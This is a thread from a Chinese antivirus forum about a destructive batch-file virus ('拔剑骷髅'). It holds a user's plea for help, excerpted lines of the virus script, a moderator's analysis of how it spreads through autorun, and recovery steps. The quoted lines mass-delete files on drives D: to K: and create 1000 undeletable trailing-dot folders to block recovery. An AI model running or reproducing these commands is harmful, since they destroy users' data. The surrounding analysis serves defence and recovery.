瑞星卡卡安全论坛

电脑中了拔剑骷髅病毒~~~~所有东西都给删掉了！咋办啊？？
这文件夹没法格式化.删除.打开.===.重新装了系统还是一样的啊,所有文件都变成文件夹。打不开，删不掉。求大家，现在用公司的电脑求救.


用户系统信息：Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 SE 2.X MetaSr 1.0

在哪儿中的？有病毒样本没？请作为附件发上来。

若没样本，通过短信给我个带毒的网址也行。

那台电脑无法进入系统了，不过网上有视频http://v.youku.com/v_show/id_XMjMzMzkwODY0.html

视频有啥用？要的是病毒程序，或者是带毒的网页。


没病毒样本，我无法发表意见。

猫叔
不知道这个行不行

出处：
http://bbs.hsw.cn/read.php?tid=1501917

分段落整理后的在附件【可能有错误】


权限：100


其中有这两句：


@REM [ 攻击硬盘数据 ]
@del /f /s /q D:\*.* & del /f /s /q E:\*.* & del /f /s /q F:\*.* & del /f /s /q G:\*.* & del /f /s /q H:\*.* & del /f /s /q I:\*.* & del /f /s /q J:\*.* & del /f /s /q K:\*.*【后边省略】






@REM [ 插入垃圾目录到硬盘，阻碍数据恢复 ]
@if exist C:\拔剑※骷髅1000..\ goto da
@for /l %%i in (1 1 1000) do (md C:\拔剑※骷髅%%i..\ & md D:\繡氺¤崶錵%%i..\ & md E:\SEX女郎%%i..\ & md F:\黑网伏击会%%i..\ & md G:\DOS的威力%%i..\ & md H:\病毒钚牁怕%%i..\ & md I:\嚇死伱鞡箌%%i..\) :da

附件: 新建文本文档.txt

纯破坏性病毒，删除所有驱动器下正常文件，建立带“.”字符的不可删除的歧义文件夹，并利用系统默认的自动播放和autorun.inf的关系反复感染和破坏计算机文档。

这病毒在VISTA以上操作系统下，可破坏计算机文档，但建立带“.”字符的不可删除的歧义文件夹应该不能成功。

恢复方法：
1、有出厂备份或GHOST备份的话，直接恢复C盘至出厂状态或正常备份，进系统后不要以任何方式访问除C盘以外的任何驱动器，直接格式化系统盘以外所有驱动器。
2、无备份的话，格式化C盘重装系统，进系统后不要以任何方式访问除C盘以外的任何驱动器，直接格式化系统盘以外所有驱动器。

猜测病毒作者发明此病毒的本意：
1、炫耀所掌握的DOS命令行能力；
2、破坏染毒计算机的正常文件。

:kaka12:

谢谢提供样本，收了。

里面可能有我需要的代码~~~

新手学习 感谢分享

安全模式 进行杀毒

:kaka5: